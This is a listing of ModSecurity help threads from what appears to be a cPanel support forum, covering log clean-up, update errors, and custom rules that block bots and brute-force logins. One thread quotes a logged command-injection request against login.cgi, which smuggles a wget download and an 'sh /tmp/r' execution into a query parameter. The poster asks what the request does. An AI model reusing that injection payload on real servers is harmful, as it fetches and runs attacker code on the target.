1. A

    How to Remove ModSecurity?

    Hi! I've searched this for thousands of topics and haven't found it, oddly enough. I would like to know from any of you how can I clear ModSecurity logs? I already deleted modsec_audit.log, but the logs continue. In my case I have more than 20,000 pages of logs.
  2. J

    In Progress [CPANEL-27532] /scripts/modsec_vendor update failed

    All of our servers are reporting identical update failures: The cPanel & WHM update process failed for the following reason: Maintenance ended; however, it did not exit cleanly (256). The following events were logged: “scripts/modsec_vendor”. Review the update logs to determine why the update...
  3. joaosavioli

    Limiting ModSecurity rule to specific files?

    Hi! Please, how could I limit the action of this rule only in wp-login.php and xmlrpc.php? SecRule REQUEST_HEADERS:User-Agent "@contains gecko" "id:5000501,t:none,t:lowercase,deny,nolog,msg:'BAD BOT - Detected and Blocked. '" Thank you! Joao
  4. weblinks

    Comodo WAF ModSecurity ruleset leading to large secdatadir cache files

    CLOUDLINUX 7.6 [] v78.0.23 Hi, I am getting this alert Time: Mon May 20 04:00:08 2019 +0500 ModSecurity persistent IP database (/var/cpanel/secdatadir/ip.pag) size is 51.73GB This requires further investigation otherwise it will start to affect server performance. but when I am checking...
  5. J

    SOLVED mod_security rule not working

    Trying to stop a bad bot from accessing server using mod_security rules. I have the following but it's not working. SecRule REQUEST_HEADERS:User-Agent "@rx ^(?:Datanyze)$" "msg:'Datanyze blocked',phase:1,log,id:777777,t:none,block,status:403" the word "Datanyze" is contained in the User...
  6. jonh


    I'm getting this error in ModSecurity: collections_remove_stale: Failed to access DBM file "/var/cpanel/secdatadir/global": Permission denied I don't have mod_druid2 enabled. All info says this is the issue, but I don't have this mod loaded/enabled. Causing not to be able to access admin ajax...
  7. cuzzmunger

    ModSecurity - Domain listed not mine

    Hi There, I'm sorry to ask such a silly question but I'm seeing hits on my server through ModSecurity - Tools from other domains or blank altogether with just an IP. I'm not hosting the domain so why am I seeing these hits along with my ones? Any help appreciated. Kim. OWASP3 Hits List...
  8. S

    SOLVED Modsec found critical issue, but did nothing about it?

    I guess I don't understand how modsec works. How did it log this error, but seemingly do nothing about it? Message: Warning. Matched phrase "masscan" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "33"] [id...
  9. O

    Disabling several mod_security rules due to 403 response to POST request?

    I upgraded to WHM 76 and started having an issue where mod_security was blocking form submits that included code. It seemed that whenever the server received a POST request that contained a lot of triangle brackets and matched some code rules/regex and took me to a 403 Forbidden error This was...
  10. S

    SOLVED modsec version?

    I'm running cPanel v74.0.12. It has modsecurity installed with Apache. How do I find out the version of modsec I have? I looked everywhere and cannot find a single thing about version.
  11. M

    Advice on modsecurity response when rule is hit

    Hi, I've been playing with modsecurity past few days. My experiment mostly is posting illegal requests to a website and checking audit log for rule HIT. I am confused on how ModSecurity should work. For example: I do simple GET...
  12. T

    Update hangs due to 3rd Party ModSec Rules

    Updating cPanel/WHM via WebUI -- when using 3rd party ModSecurity ruleset provider WebUI process sticks at 94% and never progresses past this point. If I leave the UI page and come back, it reports it is still in progress and shows me the log file with the same contents -- up to...
  13. M

    SOLVED [EA-8081] ModSecurity v2.9.3 update

    I read ModSecurity has released v2.9.3 This should fix some major issues with modruid2 and permissions on folders modsecurity needed. Any idea when this update will be released for Easy Apache 4 / cPanel users? Or is there a manual update method suggested ? Thanks
  14. Q

    A Guide to ModSecurity in 2018, for administrators

    I have worked in web hosting for nearly 10 years. If you know me, please, now is not the time :) I have found some good community works which help for monitoring ModSec attacks in a live and manageable fashion. I much prefer to use RPM to manage rules (opposed to YAML) because versioning is...
  15. V

    ModSecurity add & remove rule for a domain

    Hi. I have multiple domains on my server protected with ModSecurity tools. I use a rule (Default HTTP policy: restricted_extensions rule 900240) in ModSecurity that I wish to remove for a single domain BUT replace it with another rule that is very similar and allows access to a certain file...
  16. P

    SOLVED Error when installing mod_security via WHM >> EA4

    when i am trying to update mod_security2 via easyapache 4 in whm then i am receiving following errors: Update Error: Error: Package: ea-apache24-mod_security2-2.9.2-9.9.13.cpanel.x86_64 (EA4) Requires: ea-apr-util(x86-64) Available: ea-apr-util-1.6.1-1.1.1.cpanel.x86_64 (EA4)...
  17. joaosavioli

    Brute force wp-login.php modsecurity

    Hi! Today morning I had a problem about an attack against some websties hosted in my server. This caused apache very slow and high load. A lot of IP address (about 900 address) trying to access wp-login.php of some websites (about 20 websites), at the same time. Do you have any way to block...
  18. L

    LUA issues with EA3

    EA3 WHM v72.0.11 stable CentOS 6 ConfigServer cmc: v3.01 is installed. Get an build error with EA3 and mod security. !! The “/usr/local/apache/bin/httpd” command (process 15970) reported error number 1 when it ended. Configuration problem detected on line 3 of file...
  19. N

    disable/enable a modsecurity rule thru ssh

    Is it possible to enable/disable a modsecurity rule(One of my custom rule) thru ssh? If yes, how to do it? thanks.
  20. W

    SOLVED Entry in Mod Security Log question

    We recently found some scripts that look pretty nasty.. Any body have any idea what this person was trying to do? GET /login.cgi?cli=aa%20aa%27;wget%20http://;sh%20/tmp/r%27$ thanks